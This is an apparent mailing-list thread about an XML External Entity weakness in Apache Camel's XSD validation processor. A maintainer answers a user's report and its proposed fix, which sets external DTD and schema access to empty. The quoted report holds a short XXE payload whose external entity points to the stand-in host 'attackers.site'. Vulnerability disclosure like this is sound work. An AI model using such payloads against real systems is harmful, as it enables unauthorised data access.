Re: XML External Entity (XXE) - validator vulnerability ?
Normally we talk about this kind of issue in the private mailing list.
As you already provide a fix for it, you can send a PR  with the fix as
the contribution document suggested. I'd happy to apply it into
I'm not sure how did you deploy the camel application. Normally you can
create a patch jar which just has the fixed classed and put it as the first
element in the class path to override the old version of Camel class.
Blog: http://willemjiang.blogspot.com (English)
On Sat, Apr 14, 2018 at 7:23 PM, Karel Jelínek <karel.jelinek@xxxxxxxxxxx>
> Dear All,
> we are using XSD validation processor by camel-core library
> Our penetration tests found that application can be attacked by "XML
> External Entity (XXE)" (https://www.owasp.org/index.p
> We think that classes infected by this vulnerability are
> Method SchemaReader.createSchemaFactory should also set property
> "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"
> Method ValidatingProcessor.doProcess should set property to validator class
> Validator validator = schema.newValidator();
> //prevent XXE attack
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
> If we try to validate infected XML against XSD we can see that camel is
> trying to access external site (attackers.site) in this example
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE root [
> <!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
> Disabling mentioned properties should do the trick
> I would like to ask you if this will be created as a security BUG in camel
> and if it will be fixed in the future version?
> Can we use some workaround? Write our custom implementation of
> ValidatingProcessor? Is it possible?
> Best regards
> Karel Jelínek
> Unicorn Systems